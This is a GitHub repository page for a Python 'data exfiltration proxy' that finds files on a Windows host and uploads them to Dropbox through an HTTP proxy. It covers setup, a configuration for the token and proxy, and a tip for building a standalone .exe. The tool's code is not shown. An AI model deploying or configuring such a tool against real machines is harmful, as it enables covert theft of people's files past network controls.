Skip to content

alexoslabs2/Data-exfiltration-Proxy

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 

Repository files navigation

Data Exfiltration Proxy

Script for discovering and uploading any files on a Windows host to Dropbox over HTTPS using a proxy.

Prerequisites

System Requirements

  • Windows 10 / 11
  • Python 3.8+

Accounts & Credentials

  • Dropbox API App with an access token.
  • Proxy host/port to HTTP Tunneling

Installation

Clone and prepare your environment:

git clone https://github.com/alexoslabs2/data-exfiltration-proxy.git
cd data-exfiltration-proxy
pip install dropbox requests[socks]

Configuration

ACCESS_TOKEN = 'YOUR_DROPBOX_ACCESS_TOKEN'
PROXY_URL = 'http://[Proxy IP]:3128'
DROPBOX_FOLDER = '/Images'

Tip: Create a Windows .exe

  1. Install PyInstaller
pip install pyinstaller
  1. Build the Executable
pyinstaller --onefile your_script.py

About

Script for discovering and uploading any files on a Windows host to Dropbox over HTTPS using a proxy.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages